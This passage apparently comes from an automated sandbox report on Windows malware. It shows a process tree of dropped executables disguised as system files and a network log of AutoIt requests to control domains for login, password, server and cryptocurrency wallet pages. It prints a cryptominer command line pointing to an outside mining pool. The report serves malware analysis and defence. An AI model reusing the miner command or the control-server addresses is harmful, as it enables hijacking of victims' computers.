                                                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                                                              • Drops file in System32 directory
                                                                                                                                                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                              PID:3752
                                                                                                                                                                                                                                                            • C:\Programdata\RealtekHD\taskhost.exe
                                                                                                                                                                                                                                                              C:\Programdata\RealtekHD\taskhost.exe
                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                                                              • Drops file in System32 directory
                                                                                                                                                                                                                                                              • Suspicious behavior: GetForegroundWindowSpam
                                                                                                                                                                                                                                                              PID:4484
                                                                                                                                                                                                                                                              • C:\Programdata\WindowsTask\winlogon.exe
                                                                                                                                                                                                                                                                C:\Programdata\WindowsTask\winlogon.exe
                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                                                PID:4432
                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /C schtasks /query /fo list
                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                    PID:4560
                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                      schtasks /query /fo list
                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                        PID:4624
                                                                                                                                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c ipconfig /flushdns
                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                      PID:4380
                                                                                                                                                                                                                                                                      • C:\Windows\system32\ipconfig.exe
                                                                                                                                                                                                                                                                        ipconfig /flushdns
                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                        • Gathers network information
                                                                                                                                                                                                                                                                        PID:4424
                                                                                                                                                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c gpupdate /force
                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                        PID:4592
                                                                                                                                                                                                                                                                        • C:\Windows\system32\gpupdate.exe
                                                                                                                                                                                                                                                                          gpupdate /force
                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                            PID:4836
                                                                                                                                                                                                                                                                        • C:\ProgramData\WindowsTask\audiodg.exe
                                                                                                                                                                                                                                                                          C:\ProgramData\WindowsTask\audiodg.exe
                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                                                                          PID:4396
                                                                                                                                                                                                                                                                        • C:\ProgramData\WindowsTask\MicrosoftHost.exe
                                                                                                                                                                                                                                                                          C:\ProgramData\WindowsTask\MicrosoftHost.exe -o stratum+tcp://loders.xyz:3333 -u CPU --donate-level=1 -k -t1
                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                          PID:4640
                                                                                                                                                                                                                                                                      • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                        c:\windows\system32\svchost.exe -k networkservice -s TermService
                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                          PID:5028
                                                                                                                                                                                                                                                                        • C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                                          C:\Windows\System32\svchost.exe -k NetworkService -s TermService
                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                          PID:4568
                                                                                                                                                                                                                                                                        • C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                                          C:\Windows\System32\svchost.exe -k NetworkService -s TermService
                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                            PID:4244
                                                                                                                                                                                                                                                                          • C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                                            C:\Windows\System32\svchost.exe -k NetworkService -s TermService
                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                            PID:4424

                                                                                                                                                                                                                                                                          Network

                                                                                                                                                                                                                                                                          • flag-unknown
                                                                                                                                                                                                                                                                            DNS
                                                                                                                                                                                                                                                                            rms-server.tektonit.ru
                                                                                                                                                                                                                                                                            Remote address:
                                                                                                                                                                                                                                                                            8.8.8.8:53
                                                                                                                                                                                                                                                                            Request
                                                                                                                                                                                                                                                                            rms-server.tektonit.ru
                                                                                                                                                                                                                                                                            IN A
                                                                                                                                                                                                                                                                            Response
                                                                                                                                                                                                                                                                            rms-server.tektonit.ru
                                                                                                                                                                                                                                                                            IN A
                                                                                                                                                                                                                                                                            185.175.44.167
                                                                                                                                                                                                                                                                          • flag-unknown
                                                                                                                                                                                                                                                                            DNS
                                                                                                                                                                                                                                                                            ip-api.com
                                                                                                                                                                                                                                                                            Remote address:
                                                                                                                                                                                                                                                                            8.8.8.8:53
                                                                                                                                                                                                                                                                            Request
                                                                                                                                                                                                                                                                            ip-api.com
                                                                                                                                                                                                                                                                            IN A
                                                                                                                                                                                                                                                                            Response
                                                                                                                                                                                                                                                                            ip-api.com
                                                                                                                                                                                                                                                                            IN A
                                                                                                                                                                                                                                                                            208.95.112.1
                                                                                                                                                                                                                                                                          • flag-unknown
                                                                                                                                                                                                                                                                            GET
                                                                                                                                                                                                                                                                            http://ip-api.com/json
                                                                                                                                                                                                                                                                            winit.exe
                                                                                                                                                                                                                                                                            Remote address:
                                                                                                                                                                                                                                                                            208.95.112.1:80
                                                                                                                                                                                                                                                                            Request
                                                                                                                                                                                                                                                                            GET /json HTTP/1.1
                                                                                                                                                                                                                                                                            User-Agent: AutoIt
                                                                                                                                                                                                                                                                            Host: ip-api.com
                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                            Response
                                                                                                                                                                                                                                                                            HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Date: Wed, 18 Nov 2020 13:40:37 GMT
                                                                                                                                                                                                                                                                            Content-Type: application/json; charset=utf-8
                                                                                                                                                                                                                                                                            Content-Length: 322
                                                                                                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                            X-Ttl: 48
                                                                                                                                                                                                                                                                            X-Rl: 43
                                                                                                                                                                                                                                                                          • flag-unknown
                                                                                                                                                                                                                                                                            DNS
                                                                                                                                                                                                                                                                            freemail.freehost.com.ua
                                                                                                                                                                                                                                                                            Remote address:
                                                                                                                                                                                                                                                                            8.8.8.8:53
                                                                                                                                                                                                                                                                            Request
                                                                                                                                                                                                                                                                            freemail.freehost.com.ua
                                                                                                                                                                                                                                                                            IN A
                                                                                                                                                                                                                                                                            Response
                                                                                                                                                                                                                                                                            freemail.freehost.com.ua
                                                                                                                                                                                                                                                                            IN A
                                                                                                                                                                                                                                                                            194.0.200.251
                                                                                                                                                                                                                                                                          • flag-unknown
                                                                                                                                                                                                                                                                            DNS
                                                                                                                                                                                                                                                                            wininit.club
                                                                                                                                                                                                                                                                            Remote address:
                                                                                                                                                                                                                                                                            8.8.8.8:53
                                                                                                                                                                                                                                                                            Request
                                                                                                                                                                                                                                                                            wininit.club
                                                                                                                                                                                                                                                                            IN A
                                                                                                                                                                                                                                                                            Response
                                                                                                                                                                                                                                                                            wininit.club
                                                                                                                                                                                                                                                                            IN A
                                                                                                                                                                                                                                                                            109.248.11.138
                                                                                                                                                                                                                                                                          • flag-unknown
                                                                                                                                                                                                                                                                            GET
                                                                                                                                                                                                                                                                            http://wininit.club/STATUS.html
                                                                                                                                                                                                                                                                            update.bin.exe
                                                                                                                                                                                                                                                                            Remote address:
                                                                                                                                                                                                                                                                            109.248.11.138:80
                                                                                                                                                                                                                                                                            Request
                                                                                                                                                                                                                                                                            GET /STATUS.html HTTP/1.1
                                                                                                                                                                                                                                                                            User-Agent: AutoIt
                                                                                                                                                                                                                                                                            Host: wininit.club
                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                            Response
                                                                                                                                                                                                                                                                            HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Date: Wed, 18 Nov 2020 13:40:46 GMT
                                                                                                                                                                                                                                                                            Server: Apache/2.4.25 (Debian)
                                                                                                                                                                                                                                                                            Last-Modified: Wed, 23 Sep 2020 12:26:16 GMT
                                                                                                                                                                                                                                                                            ETag: "6-5affa30aaa2a7"
                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                            Content-Length: 6
                                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                                          • flag-unknown
                                                                                                                                                                                                                                                                            GET
                                                                                                                                                                                                                                                                            http://wininit.club/L.html
                                                                                                                                                                                                                                                                            update.bin.exe
                                                                                                                                                                                                                                                                            Remote address:
                                                                                                                                                                                                                                                                            109.248.11.138:80
                                                                                                                                                                                                                                                                            Request
                                                                                                                                                                                                                                                                            GET /L.html HTTP/1.1
                                                                                                                                                                                                                                                                            User-Agent: AutoIt
                                                                                                                                                                                                                                                                            Host: wininit.club
                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                            Response
                                                                                                                                                                                                                                                                            HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Date: Wed, 18 Nov 2020 13:40:46 GMT
                                                                                                                                                                                                                                                                            Server: Apache/2.4.25 (Debian)
                                                                                                                                                                                                                                                                            Last-Modified: Wed, 23 Sep 2020 11:35:58 GMT
                                                                                                                                                                                                                                                                            ETag: "4-5aff97cbe9aa2"
                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                            Content-Length: 4
                                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                                          • flag-unknown
                                                                                                                                                                                                                                                                            GET
                                                                                                                                                                                                                                                                            http://wininit.club/P.html
                                                                                                                                                                                                                                                                            update.bin.exe
                                                                                                                                                                                                                                                                            Remote address:
                                                                                                                                                                                                                                                                            109.248.11.138:80
                                                                                                                                                                                                                                                                            Request
                                                                                                                                                                                                                                                                            GET /P.html HTTP/1.1
                                                                                                                                                                                                                                                                            User-Agent: AutoIt
                                                                                                                                                                                                                                                                            Host: wininit.club
                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                            Response
                                                                                                                                                                                                                                                                            HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Date: Wed, 18 Nov 2020 13:40:47 GMT
                                                                                                                                                                                                                                                                            Server: Apache/2.4.25 (Debian)
                                                                                                                                                                                                                                                                            Last-Modified: Wed, 23 Sep 2020 11:35:58 GMT
                                                                                                                                                                                                                                                                            ETag: "c-5aff97cbe0e04"
                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                            Content-Length: 12
                                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                                          • flag-unknown
                                                                                                                                                                                                                                                                            GET
                                                                                                                                                                                                                                                                            http://wininit.club/S.html
                                                                                                                                                                                                                                                                            update.bin.exe
                                                                                                                                                                                                                                                                            Remote address:
                                                                                                                                                                                                                                                                            109.248.11.138:80
                                                                                                                                                                                                                                                                            Request
                                                                                                                                                                                                                                                                            GET /S.html HTTP/1.1
                                                                                                                                                                                                                                                                            User-Agent: AutoIt
                                                                                                                                                                                                                                                                            Host: wininit.club
                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                            Response
                                                                                                                                                                                                                                                                            HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Date: Wed, 18 Nov 2020 13:40:48 GMT
                                                                                                                                                                                                                                                                            Server: Apache/2.4.25 (Debian)
                                                                                                                                                                                                                                                                            Last-Modified: Wed, 23 Sep 2020 11:35:58 GMT
                                                                                                                                                                                                                                                                            ETag: "d-5aff97cbc970a"
                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                            Content-Length: 13
                                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                                          • flag-unknown
                                                                                                                                                                                                                                                                            DNS
                                                                                                                                                                                                                                                                            wininit.club
                                                                                                                                                                                                                                                                            Remote address:
                                                                                                                                                                                                                                                                            8.8.8.8:53
                                                                                                                                                                                                                                                                            Request
                                                                                                                                                                                                                                                                            wininit.club
                                                                                                                                                                                                                                                                            IN A
                                                                                                                                                                                                                                                                            Response
                                                                                                                                                                                                                                                                            wininit.club
                                                                                                                                                                                                                                                                            IN A
                                                                                                                                                                                                                                                                            109.248.11.138
                                                                                                                                                                                                                                                                          • flag-unknown
                                                                                                                                                                                                                                                                            GET
                                                                                                                                                                                                                                                                            http://wininit.club/L2.html
                                                                                                                                                                                                                                                                            taskhost.exe
                                                                                                                                                                                                                                                                            Remote address:
                                                                                                                                                                                                                                                                            109.248.11.138:80
                                                                                                                                                                                                                                                                            Request
                                                                                                                                                                                                                                                                            GET /L2.html HTTP/1.1
                                                                                                                                                                                                                                                                            User-Agent: AutoIt
                                                                                                                                                                                                                                                                            Host: wininit.club
                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                            Response
                                                                                                                                                                                                                                                                            HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Date: Wed, 18 Nov 2020 13:40:47 GMT
                                                                                                                                                                                                                                                                            Server: Apache/2.4.25 (Debian)
                                                                                                                                                                                                                                                                            Last-Modified: Wed, 23 Sep 2020 11:37:46 GMT
                                                                                                                                                                                                                                                                            ETag: "6-5aff98331e094"
                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                            Content-Length: 6
                                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                                          • flag-unknown
                                                                                                                                                                                                                                                                            GET
                                                                                                                                                                                                                                                                            http://wininit.club/L.html
                                                                                                                                                                                                                                                                            taskhost.exe
                                                                                                                                                                                                                                                                            Remote address:
                                                                                                                                                                                                                                                                            109.248.11.138:80
                                                                                                                                                                                                                                                                            Request
                                                                                                                                                                                                                                                                            GET /L.html HTTP/1.1
                                                                                                                                                                                                                                                                            User-Agent: AutoIt
                                                                                                                                                                                                                                                                            Host: wininit.club
                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                            Response
                                                                                                                                                                                                                                                                            HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Date: Wed, 18 Nov 2020 13:40:48 GMT
                                                                                                                                                                                                                                                                            Server: Apache/2.4.25 (Debian)
                                                                                                                                                                                                                                                                            Last-Modified: Wed, 23 Sep 2020 11:35:58 GMT
                                                                                                                                                                                                                                                                            ETag: "4-5aff97cbe9aa2"
                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                            Content-Length: 4
                                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                                          • flag-unknown
                                                                                                                                                                                                                                                                            GET
                                                                                                                                                                                                                                                                            http://wininit.club/P.html
                                                                                                                                                                                                                                                                            taskhost.exe
                                                                                                                                                                                                                                                                            Remote address:
                                                                                                                                                                                                                                                                            109.248.11.138:80
                                                                                                                                                                                                                                                                            Request
                                                                                                                                                                                                                                                                            GET /P.html HTTP/1.1
                                                                                                                                                                                                                                                                            User-Agent: AutoIt
                                                                                                                                                                                                                                                                            Host: wininit.club
                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                            Response
                                                                                                                                                                                                                                                                            HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Date: Wed, 18 Nov 2020 13:40:49 GMT
                                                                                                                                                                                                                                                                            Server: Apache/2.4.25 (Debian)
                                                                                                                                                                                                                                                                            Last-Modified: Wed, 23 Sep 2020 11:35:58 GMT
                                                                                                                                                                                                                                                                            ETag: "c-5aff97cbe0e04"
                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                            Content-Length: 12
                                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                                          • flag-unknown
                                                                                                                                                                                                                                                                            GET
                                                                                                                                                                                                                                                                            http://wininit.club/S.html
                                                                                                                                                                                                                                                                            taskhost.exe
                                                                                                                                                                                                                                                                            Remote address:
                                                                                                                                                                                                                                                                            109.248.11.138:80
                                                                                                                                                                                                                                                                            Request
                                                                                                                                                                                                                                                                            GET /S.html HTTP/1.1
                                                                                                                                                                                                                                                                            User-Agent: AutoIt
                                                                                                                                                                                                                                                                            Host: wininit.club
                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                            Response
                                                                                                                                                                                                                                                                            HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Date: Wed, 18 Nov 2020 13:40:50 GMT
                                                                                                                                                                                                                                                                            Server: Apache/2.4.25 (Debian)
                                                                                                                                                                                                                                                                            Last-Modified: Wed, 23 Sep 2020 11:35:58 GMT
                                                                                                                                                                                                                                                                            ETag: "d-5aff97cbc970a"
                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                            Content-Length: 13
                                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                                          • flag-unknown
                                                                                                                                                                                                                                                                            DNS
                                                                                                                                                                                                                                                                            dashost.club
                                                                                                                                                                                                                                                                            Remote address:
                                                                                                                                                                                                                                                                            8.8.8.8:53
                                                                                                                                                                                                                                                                            Request
                                                                                                                                                                                                                                                                            dashost.club
                                                                                                                                                                                                                                                                            IN A
                                                                                                                                                                                                                                                                            Response
                                                                                                                                                                                                                                                                            dashost.club
                                                                                                                                                                                                                                                                            IN A
                                                                                                                                                                                                                                                                            185.212.148.107
                                                                                                                                                                                                                                                                          • flag-unknown
                                                                                                                                                                                                                                                                            GET
                                                                                                                                                                                                                                                                            http://dashost.club/ex20mac/STATUS.html
                                                                                                                                                                                                                                                                            taskhost.exe
                                                                                                                                                                                                                                                                            Remote address:
                                                                                                                                                                                                                                                                            185.212.148.107:80
                                                                                                                                                                                                                                                                            Request
                                                                                                                                                                                                                                                                            GET /ex20mac/STATUS.html HTTP/1.1
                                                                                                                                                                                                                                                                            User-Agent: AutoIt
                                                                                                                                                                                                                                                                            Host: dashost.club
                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                            Response
                                                                                                                                                                                                                                                                            HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Date: Wed, 18 Nov 2020 13:40:48 GMT
                                                                                                                                                                                                                                                                            Server: Apache/2.4.25 (Debian)
                                                                                                                                                                                                                                                                            Last-Modified: Wed, 23 Sep 2020 05:32:07 GMT
                                                                                                                                                                                                                                                                            ETag: "6-5aff46784bb87"
                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                            Content-Length: 6
                                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                                          • flag-unknown
                                                                                                                                                                                                                                                                            GET
                                                                                                                                                                                                                                                                            http://dashost.club/ex20mac/loaderTOP.html
                                                                                                                                                                                                                                                                            taskhost.exe
                                                                                                                                                                                                                                                                            Remote address:
                                                                                                                                                                                                                                                                            185.212.148.107:80
                                                                                                                                                                                                                                                                            Request
                                                                                                                                                                                                                                                                            GET /ex20mac/loaderTOP.html HTTP/1.1
                                                                                                                                                                                                                                                                            User-Agent: AutoIt
                                                                                                                                                                                                                                                                            Host: dashost.club
                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                            Response
                                                                                                                                                                                                                                                                            HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                            Date: Wed, 18 Nov 2020 13:40:48 GMT
                                                                                                                                                                                                                                                                            Server: Apache/2.4.25 (Debian)
                                                                                                                                                                                                                                                                            Content-Length: 274
                                                                                                                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                          • flag-unknown
                                                                                                                                                                                                                                                                            GET
                                                                                                                                                                                                                                                                            http://dashost.club/LTC.html
                                                                                                                                                                                                                                                                            taskhost.exe
                                                                                                                                                                                                                                                                            Remote address:
                                                                                                                                                                                                                                                                            185.212.148.107:80
                                                                                                                                                                                                                                                                            Request
                                                                                                                                                                                                                                                                            GET /LTC.html HTTP/1.1
                                                                                                                                                                                                                                                                            User-Agent: AutoIt
                                                                                                                                                                                                                                                                            Host: dashost.club
                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                            Response
                                                                                                                                                                                                                                                                            HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Date: Wed, 18 Nov 2020 13:40:48 GMT
                                                                                                                                                                                                                                                                            Server: Apache/2.4.25 (Debian)
                                                                                                                                                                                                                                                                            Last-Modified: Wed, 23 Sep 2020 05:32:00 GMT
                                                                                                                                                                                                                                                                            ETag: "22-5aff4671e9f6e"
                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                            Content-Length: 34
                                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                                          • flag-unknown
                                                                                                                                                                                                                                                                            GET
                                                                                                                                                                                                                                                                            http://dashost.club/BTC.html
                                                                                                                                                                                                                                                                            taskhost.exe
                                                                                                                                                                                                                                                                            Remote address:
                                                                                                                                                                                                                                                                            185.212.148.107:80
                                                                                                                                                                                                                                                                            Request
                                                                                                                                                                                                                                                                            GET /BTC.html HTTP/1.1
                                                                                                                                                                                                                                                                            User-Agent: AutoIt
                                                                                                                                                                                                                                                                            Host: dashost.club
                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                            Response
                                                                                                                                                                                                                                                                            HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Date: Wed, 18 Nov 2020 13:40:49 GMT
                                                                                                                                                                                                                                                                            Server: Apache/2.4.25 (Debian)
                                                                                                                                                                                                                                                                            Last-Modified: Wed, 23 Sep 2020 05:31:59 GMT
                                                                                                                                                                                                                                                                            ETag: "22-5aff46713647c"
                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                            Content-Length: 34
                                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                                          • flag-unknown
                                                                                                                                                                                                                                                                            GET
                                                                                                                                                                                                                                                                            http://dashost.club/ETH.html
                                                                                                                                                                                                                                                                            taskhost.exe
                                                                                                                                                                                                                                                                            Remote address:
                                                                                                                                                                                                                                                                            185.212.148.107:80
                                                                                                                                                                                                                                                                            Request
                                                                                                                                                                                                                                                                            GET /ETH.html HTTP/1.1
                                                                                                                                                                                                                                                                            User-Agent: AutoIt
                                                                                                                                                                                                                                                                            Host: dashost.club
                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                            Response
                                                                                                                                                                                                                                                                            HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Date: Wed, 18 Nov 2020 13:40:51 GMT
                                                                                                                                                                                                                                                                            Server: Apache/2.4.25 (Debian)
                                                                                                                                                                                                                                                                            Last-Modified: Wed, 23 Sep 2020 05:32:00 GMT
                                                                                                                                                                                                                                                                            ETag: "2a-5aff467198e94"
                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                            Content-Length: 42
                                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                                          • flag-unknown
                                                                                                                                                                                                                                                                            GET
                                                                                                                                                                                                                                                                            http://dashost.club/ZEC.html
                                                                                                                                                                                                                                                                            taskhost.exe
                                                                                                                                                                                                                                                                            Remote address:
                                                                                                                                                                                                                                                                            185.212.148.107:80
                                                                                                                                                                                                                                                                            Request
                                                                                                                                                                                                                                                                            GET /ZEC.html HTTP/1.1
                                                                                                                                                                                                                                                                            User-Agent: AutoIt
                                                                                                                                                                                                                                                                            Host: dashost.club
                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                            Response
                                                                                                                                                                                                                                                                            HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Date: Wed, 18 Nov 2020 13:40:52 GMT
                                                                                                                                                                                                                                                                            Server: Apache/2.4.25 (Debian)
                                                                                                                                                                                                                                                                            Last-Modified: Wed, 23 Sep 2020 05:32:00 GMT
                                                                                                                                                                                                                                                                            ETag: "23-5aff467226829"
                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                            Content-Length: 35
                                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                                          • flag-unknown
                                                                                                                                                                                                                                                                            GET
                                                                                                                                                                                                                                                                            http://dashost.club/DOGE.html
                                                                                                                                                                                                                                                                            taskhost.exe
                                                                                                                                                                                                                                                                            Remote address:
                                                                                                                                                                                                                                                                            185.212.148.107:80
                                                                                                                                                                                                                                                                            Request
                                                                                                                                                                                                                                                                            GET /DOGE.html HTTP/1.1
                                                                                                                                                                                                                                                                            User-Agent: AutoIt
                                                                                                                                                                                                                                                                            Host: dashost.club
                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                            Response
                                                                                                                                                                                                                                                                            HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Date: Wed, 18 Nov 2020 13:40:53 GMT
                                                                                                                                                                                                                                                                            Server: Apache/2.4.25 (Debian)
                                                                                                                                                                                                                                                                            Last-Modified: Wed, 23 Sep 2020 05:32:00 GMT
                                                                                                                                                                                                                                                                            ETag: "22-5aff46717b9d7"
                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                            Content-Length: 34
                                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                                          • flag-unknown
                                                                                                                                                                                                                                                                            GET
                                                                                                                                                                                                                                                                            http://dashost.club/ex20mac/Login.html
                                                                                                                                                                                                                                                                            taskhost.exe
                                                                                                                                                                                                                                                                            Remote address:
                                                                                                                                                                                                                                                                            185.212.148.107:80
                                                                                                                                                                                                                                                                            Request
                                                                                                                                                                                                                                                                            GET /ex20mac/Login.html HTTP/1.1
                                                                                                                                                                                                                                                                            User-Agent: AutoIt
                                                                                                                                                                                                                                                                            Host: dashost.club
                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                            Response
                                                                                                                                                                                                                                                                            HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Date: Wed, 18 Nov 2020 13:40:53 GMT
                                                                                                                                                                                                                                                                            Server: Apache/2.4.25 (Debian)
                                                                                                                                                                                                                                                                            Last-Modified: Wed, 23 Sep 2020 05:32:07 GMT
                                                                                                                                                                                                                                                                            ETag: "4-5aff46782796a"
                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                            Content-Length: 4
                                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                                          • flag-unknown
                                                                                                                                                                                                                                                                            GET
                                                                                                                                                                                                                                                                            http://dashost.club/ex20mac/Password.html
                                                                                                                                                                                                                                                                            taskhost.exe
                                                                                                                                                                                                                                                                            Remote address:
                                                                                                                                                                                                                                                                            185.212.148.107:80
                                                                                                                                                                                                                                                                            Request
                                                                                                                                                                                                                                                                            GET /ex20mac/Password.html HTTP/1.1
                                                                                                                                                                                                                                                                            User-Agent: AutoIt
                                                                                                                                                                                                                                                                            Host: dashost.club
                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                            Response
                                                                                                                                                                                                                                                                            HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Date: Wed, 18 Nov 2020 13:40:53 GMT
                                                                                                                                                                                                                                                                            Server: Apache/2.4.25 (Debian)
                                                                                                                                                                                                                                                                            Last-Modified: Wed, 23 Sep 2020 05:32:07 GMT
                                                                                                                                                                                                                                                                            ETag: "c-5aff46782d72a"
                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                            Content-Length: 12
                                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                                          • flag-unknown
                                                                                                                                                                                                                                                                            GET
                                                                                                                                                                                                                                                                            http://dashost.club/ex20mac/Server.html
                                                                                                                                                                                                                                                                            taskhost.exe
                                                                                                                                                                                                                                                                            Remote address:
                                                                                                                                                                                                                                                                            185.212.148.107:80
                                                                                                                                                                                                                                                                            Request
                                                                                                                                                                                                                                                                            GET /ex20mac/Server.html HTTP/1.1
                                                                                                                                                                                                                                                                            User-Agent: AutoIt
                                                                                                                                                                                                                                                                            Host: dashost.club
                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                            Response
                                                                                                                                                                                                                                                                            HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Date: Wed, 18 Nov 2020 13:40:54 GMT
                                                                                                                                                                                                                                                                            Server: Apache/2.4.25 (Debian)
                                                                                                                                                                                                                                                                            Last-Modified: Wed, 23 Sep 2020 12:01:17 GMT
                                                                                                                                                                                                                                                                            ETag: "e-5aff9d755a10d"
                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                            Content-Length: 14
